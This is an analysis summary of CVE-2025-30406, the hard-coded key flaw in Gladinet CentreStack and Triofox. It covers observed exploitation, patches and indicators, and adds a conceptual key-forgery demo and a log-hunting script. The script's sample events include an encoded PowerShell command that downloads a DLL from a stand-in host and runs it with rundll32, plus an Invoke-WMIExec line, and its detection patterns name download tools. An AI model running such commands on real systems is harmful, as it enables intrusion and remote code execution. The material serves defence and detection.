Full Report
A recently disclosed security flaw in Gladinet CentreStack also impacts its Triofox remote access and collaboration solution, according to Huntress, with seven different organizations compromised to date. Tracked as CVE-2025-30406 (CVSS score: 9.0), the vulnerability refers to the use of a hard-coded cryptographic key that exposes internet-accessible servers to remote code execution attacks.
Analysis Summary
# Vulnerability: Critical RCE in Gladinet Triofox and CentreStack due to Hardcoded Key
## CVE Details
- CVE ID: CVE-2025-30406
- CVSS Score: 9.0 (Critical)
- CWE: Not listed in the summary. The weakness class is a hard-coded cryptographic key (CWE-321, Use of Hard-coded Cryptographic Key).
## Affected Systems
- Products: Gladinet CentreStack and Gladinet Triofox
- Versions: CentreStack versions prior to 16.4.10315.56368; Triofox versions prior to 16.4.10317.56372. The two version numbers are the fixed releases, not the last affected ones.
- Configurations: Internet-accessible servers running the affected software.
## Vulnerability Description
The vulnerability stems from a cryptographic key that is hard-coded in the configuration shipped with CentreStack and Triofox, so every unpatched installation uses the same key (the key in question is the ASP.NET machineKey in the web application's configuration). A key that is identical across all deployments is effectively public: anyone who extracts it from one copy of the product can produce data that every other server accepts as authentic, and in this case that is enough to reach Remote Code Execution (RCE) on the affected servers.
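The following is an added example, not Gladinet code, that models the generic pattern behind this flaw: a web application accepts a serialized state blob from the client and trusts it if an HMAC computed with the server's key matches. When that key is hard-coded in the shipped configuration, an attacker who has read one copy of the product knows every server's key and can mint blobs that the server treats as its own. The blob format, the key values and the "payload" field are constructed for illustration and do not reproduce the real product's format or exploit.

```python
"""Why a key shared by every installation is a remote-code-execution risk.

Added example (not the vendor's code). A server accepts a client-supplied state
blob if the HMAC tag matches. Once the tag passes, the body is trusted
completely, which is what turns a known key into code execution in products
that deserialize the body into objects. Keys and formats here are constructed.
"""
import base64
import hashlib
import hmac
import json
import secrets
from typing import Optional, Tuple

# Constructed stand-in for a key baked into a shipped config file.
# Every installation would carry this exact value.
HARDCODED_KEY = b"0123456789ABCDEF0123456789ABCDEF"


def sign_state(state: dict, key: bytes) -> str:
    """Serialize state and append an HMAC-SHA256 tag (the 'server' side)."""
    body = json.dumps(state, sort_keys=True).encode()
    tag = hmac.new(key, body, hashlib.sha256).digest()
    return base64.b64encode(body + tag).decode()


def load_state(token: str, key: bytes) -> Optional[dict]:
    """Verify the tag and return the state, or None if the tag is wrong."""
    raw = base64.b64decode(token)
    body, tag = raw[:-32], raw[-32:]
    expected = hmac.new(key, body, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        return None
    return json.loads(body)


def forge_with_shared_key(victim_key: bytes) -> Optional[dict]:
    """Attacker who knows the shipped key mints a blob and submits it.

    The 'payload' field stands in for whatever a real deserializer would act
    on; it is a constructed marker, not a gadget.
    """
    forged = sign_state({"user": "anonymous", "payload": "run-attacker-code"},
                        HARDCODED_KEY)
    return load_state(forged, victim_key)


def demo() -> Tuple[bool, bool]:
    """Return (accepted by server with hard-coded key, accepted by server with unique key)."""
    # Server A: unpatched, still using the key shipped in the configuration.
    accepted_a = forge_with_shared_key(HARDCODED_KEY) is not None
    # Server B: key generated at install time and never shipped anywhere.
    unique_key = secrets.token_bytes(32)
    accepted_b = forge_with_shared_key(unique_key) is not None
    return accepted_a, accepted_b


if __name__ == "__main__":
    a, b = demo()
    print(f"forgery accepted with hard-coded key: {a}")   # True
    print(f"forgery accepted with per-install key: {b}")  # False
```

The integrity check itself is sound; the only thing that changes between the two servers is whether the attacker can know the key. That is why a hard-coded key is treated as a critical flaw even when the cryptography around it is correct.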
## Exploitation
- Status: Exploited in the wild (active zero-day exploitation reported since March 2025).
- Complexity: Low in practice. A key that is the same on every installation needs to be extracted only once and can then be reused against any exposed server.
- Attack Vector: Network (Remote).
### Post-Exploitation Activity Observed
Attackers have been observed leveraging the RCE flaw to:
1. Download and sideload a DLL using an encoded PowerShell script.
2. Conduct lateral movement.
3. Install MeshCentral for persistent remote access (MeshAgent observed running).
4. Run Impacket PowerShell commands for enumeration.
## Impact
- Confidentiality: High (Allows code execution, leading to potential data access).
- Integrity: High (Allows code execution and system modification).
- Availability: High (Allows control over the system).
## Remediation
### Patches
- CentreStack: Version **16.4.10315.56368** or later (released April 3, 2025).
- Triofox: Version **16.4.10317.56372** or later.
### Workarounds
The article strongly recommends updating to the patched versions immediately because the flaw is being exploited; no specific workarounds are detailed, so patching is the primary defense. Patching does not undo a compromise that has already happened: any server that was internet-accessible before the fix was applied should be checked for the post-exploitation activity listed above. Because the root cause is a key value shared by every installation, also verify after upgrading that this server's key differs from the one the unpatched release shipped with.
## Detection
- Indicators of Compromise (IOCs):
  - Presence of downloaded DLL files sideloaded via PowerShell.
  - Execution of encoded PowerShell scripts.
  - Execution of Impacket PowerShell commands for enumeration.
  - Installation of MeshAgent/MeshCentral for remote access.
- Detection methods and tools: Monitor endpoint process creation and script execution on the CentreStack/Triofox hosts (decoding any encoded PowerShell so its contents can be inspected), and watch for network connections to known C2 infrastructure. Specific IPs and domains are not listed in the summary.
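The block below is an added example, not part of the Huntress report, showing how the indicators above can be applied to process-creation telemetry. It takes constructed events shaped like Windows Security event 4688 or Sysmon event 1 (host, image, command line), decodes any PowerShell `-EncodedCommand` argument (Base64 of UTF-16LE text, which is what PowerShell expects), and flags the three behaviours listed: download-and-sideload of a DLL, MeshAgent/MeshCentral, and Impacket-style enumeration. The sample events, hostnames, IP addresses and the rule patterns (including the Invoke-WMIExec/Invoke-SMBExec names used as stand-ins for PowerShell ports of Impacket tooling) are assumptions made for this example.

```python
"""Hunt for the post-exploitation pattern in process-creation logs.

Added example, not from the Huntress report. Events are constructed dicts of
the kind a SIEM would hand over for Security 4688 / Sysmon 1. Rule patterns are
assumptions for illustration, not the report's own IOC list.
"""
import base64
import re
from typing import Dict, List, Tuple


def _enc(ps: str) -> str:
    """Encode a script the way PowerShell's -EncodedCommand expects (UTF-16LE)."""
    return base64.b64encode(ps.encode("utf-16-le")).decode()


# Constructed sample events (hosts, paths and addresses are fictitious).
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"host": "web01",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc " + _enc(
         "Invoke-WebRequest http://192.0.2.10/c.dll -OutFile C:\\ProgramData\\c.dll; "
         "rundll32 C:\\ProgramData\\c.dll,Start")},
    {"host": "web01",
     "image": r"C:\Program Files\Mesh Agent\MeshAgent.exe",
     "cmdline": r'"C:\Program Files\Mesh Agent\MeshAgent.exe" -fullinstall'},
    {"host": "web01",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -EncodedCommand " + _enc(
         "Invoke-WMIExec -Target 10.0.0.5 -Command whoami")},
    {"host": "web02",  # benign: plain script, no encoding, no indicators
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1"},
]

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -en, -enc, ...)
# plus -ec. Listing the aliases explicitly avoids matching -ExecutionPolicy or
# -ErrorAction, whose arguments can look like Base64.
_ENC_ALIASES = "|".join(["ec"] + ["encodedcommand"[:i] for i in range(1, 15)])
ENC_FLAG = re.compile(r"(?i)(?:^|\s)-(?:" + _ENC_ALIASES + r")\s+([A-Za-z0-9+/=]{16,})")

# Rule patterns are assumptions for this example; tune them to local telemetry.
RULES: Dict[str, "re.Pattern[str]"] = {
    "dll_download_sideload": re.compile(
        r"(?i)(Invoke-WebRequest|DownloadFile|DownloadString|curl|wget|Start-BitsTransfer).*\.dll"),
    "meshcentral_agent": re.compile(r"(?i)meshagent|meshcentral"),
    "impacket_powershell": re.compile(
        r"(?i)Invoke-(?:WMIExec|SMBExec|SMBClient|SMBEnum)|impacket"),
}


def decode_encoded_command(cmdline: str) -> str:
    """Return the decoded -EncodedCommand script if one is present, else ''."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""  # not valid Base64/UTF-16LE; the raw-string rules still apply


def analyze_event(ev: Dict[str, str]) -> List[str]:
    """Return the rule names that fire for one event (empty list means clean)."""
    decoded = decode_encoded_command(ev["cmdline"])
    # Match against the raw command line, the decoded script and the image path.
    text = ev["cmdline"] + "\n" + decoded + "\n" + ev["image"]
    hits = [name for name, rx in RULES.items() if rx.search(text)]
    if decoded:
        hits.insert(0, "encoded_powershell")
    return hits


def hunt(events: List[Dict[str, str]]) -> List[Tuple[str, List[str]]]:
    """Return (host, fired_rules) for every event that triggers at least one rule."""
    findings = []
    for ev in events:
        hits = analyze_event(ev)
        if hits:
            findings.append((ev["host"], hits))
    return findings


if __name__ == "__main__":
    for host, hits in hunt(SAMPLE_EVENTS):
        print(f"{host}: {', '.join(hits)}")
```

Decoding the `-EncodedCommand` payload before matching is the important step: the DLL download in the first sample event and the enumeration command in the third are invisible to any rule that looks only at the raw command line, and an analyst working from the list of indicators above would miss both without it.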
## References
- News report (The Hacker News, CentreStack): hxxps://thehackernews.com/2025/04/cisa-warns-of-centrestacks-hard-coded.html
- Vendor Advisory (Triofox): hxxps://gladinetsupport.s3.us-east-1.amazonaws.com/gladinet/securityadvisory-cve-2025-triofox.pdf
- Research Report (Huntress): hxxps://www.huntress.com/blog/cve-2025-30406-critical-gladinet-centrestack-triofox-vulnerability-exploited-in-the-wild